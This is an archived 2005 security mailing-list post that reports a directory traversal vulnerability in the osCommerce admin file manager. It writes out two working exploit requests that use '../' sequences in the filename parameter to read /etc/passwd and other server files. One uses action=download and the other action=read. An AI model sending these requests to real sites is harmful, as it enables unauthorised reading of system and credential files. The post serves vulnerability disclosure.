OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
osCommerce File Manager Directory Traversal Vulnerability

From: Megasky (magaskyhotmail.com)
Date: Tue Mar 22 2005 - 10:32:05 CST


there is allready a post on this that have
file_manager.php?action=download&filename=../../../../../../etc/passwd
 
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../